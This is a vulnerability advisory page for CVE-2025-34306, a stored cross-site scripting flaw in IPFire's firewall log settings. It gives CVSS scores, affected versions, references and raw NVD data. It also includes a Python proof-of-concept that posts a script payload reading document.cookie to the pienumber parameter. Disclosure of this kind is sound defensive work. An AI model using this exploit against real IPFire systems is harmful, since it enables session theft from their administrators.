CVE-2025-34306

Description

IPFire versions prior to 2.29 (Core Update 198) contain a stored cross-site scripting (XSS) vulnerability that allows an authenticated attacker to inject arbitrary JavaScript code through the pienumber parameter when updating the default firewall IP search values. When a user updates these defaults, the application issues an HTTP POST request to /cgi-bin/logs.cgi/firewalllogip.dat with the default number of IPs in the pienumber parameter. The value of this parameter is stored and later rendered in the web interface without proper sanitation or encoding, allowing injected scripts to execute in the context of other users who view the affected page.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ipfire:ipfire:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ipfire:ipfire:2.29:core_update183:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ipfire:ipfire:2.29:core_update184:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ipfire:ipfire:2.29:core_update185:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ipfire:ipfire:2.29:core_update186:*:*:*:*:*:* - VULNERABLE

IPFire < 2.29 Core Update 198

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-34306 PoC - Stored XSS in IPFire pienumber parameter
# This PoC demonstrates the stored XSS vulnerability in IPFire firewall
# Target: IPFire < 2.29 Core Update 198
# Endpoint: /cgi-bin/logs.cgi/firewalllogip.dat

import requests
import sys
from urllib.parse import urlencode

target_url = "http://target-ipfire:444/cgi-bin/logs.cgi/firewalllogip.dat"

# XSS payload - can be customized for different attack scenarios
xss_payload = '<script>alert(document.cookie)</script>'

# Authentication credentials (low-privilege user)
auth = {
    'username': 'attacker_user',
    'password': 'attacker_password'
}

def exploit_stored_xss():
    """Send malicious pienumber parameter to store XSS payload"""
    
    # Prepare the POST data
    post_data = {
        'pienumber': xss_payload,
        'action': 'update',
        'submit': 'Save'
    }
    
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    try:
        # Send the malicious request
        response = requests.post(
            target_url,
            data=post_data,
            headers=headers,
            auth=(auth['username'], auth['password']),
            timeout=30
        )
        
        print(f"[*] Request sent to {target_url}")
        print(f"[*] Payload: {xss_payload}")
        print(f"[*] Status code: {response.status_code}")
        
        if response.status_code == 200:
            print("[+] XSS payload successfully stored!")
            print("[+] Any user viewing the firewall log IP settings will trigger the JavaScript")
        else:
            print("[-] Request failed")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    print("CVE-2025-34306 - IPFire Stored XSS via pienumber parameter")
    print("=" * 60)
    exploit_stored_xss()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-34306
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-34306
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-34306/
[4] VulDB https://vuldb.com/cve/CVE-2025-34306
[5] https://bugzilla.ipfire.org/show_bug.cgi?id=13881
[6] https://www.ipfire.org/blog/ipfire-2-29-core-update-198-released
[7] https://www.vulncheck.com/advisories/ipfire-stored-xss-via-default-ip-search-value

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-34306", "sourceIdentifier": "[email protected]", "published": "2025-10-28T15:16:10.867", "lastModified": "2025-11-03T17:01:37.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IPFire versions prior to 2.29 (Core Update 198) contain a stored cross-site scripting (XSS) vulnerability that allows an authenticated attacker to inject arbitrary JavaScript code through the pienumber parameter when updating the default firewall IP search values. When a user updates these defaults, the application issues an HTTP POST request to /cgi-bin/logs.cgi/firewalllogip.dat with the default number of IPs in the pienumber parameter. The value of this parameter is stored and later rendered in the web interface without proper sanitation or encoding, allowing injected scripts to execute in the context of other users who view the affected page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.29", "matchCriteriaId": "9A0A85D3-A192-4FD9-9510-99D85BCF334A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update183:*:*:*:*:*:*", "matchCriteriaId": "A39350F9-D6D9-49A5-88BC-C5489AA6038C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update184:*:*:*:*:*:*", "matchCriteriaId": "CDDC0CEB-073B-41A0-8A52-4DAAAD77AA6D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update185:*:*:*:*:*:*", "matchCriteriaId": "745640B9-2180-48C3-82CC-D6E73AAF95D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update186:*:*:*:*:*:*", "matchCriteriaId": "08006D41-7288-4333-83FE-B6FD7CD5C779"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update187:*:*:*:*:*:*", "matchCriteriaId": "15EE4FEE-62AB-4172-B898-19DE6F50B7AC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update188:*:*:*:*:*:*", "matchCriteriaId": "5B0ECE9B-DD45-40E1-842A-0B0B1786187E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update189:*:*:*:*:*:*", "matchCriteriaId": "9B9BDB00-A750-4053-8812-5A3854042CB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update190:*:*:*:*:*:*", "matchCriteriaId": "16F654D7-CC82-4428-BBEF-1110CAE75597"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update191:*:*:*:*:*:*", "matchCriteriaId": "FFCC61A9-AF1B-4F8A-98D2-FB7854AF0EF6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update192:*:*:*:*:*:*", "matchCriteriaId": "7A66DC97-E88F-455E-B688-88BCC95E861B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update193:*:*:*:*:*:*", "matchCriteriaId": "DDF56682-47E8-436F-B5FE-55A8B525D699"}, {"vulner ... (truncated)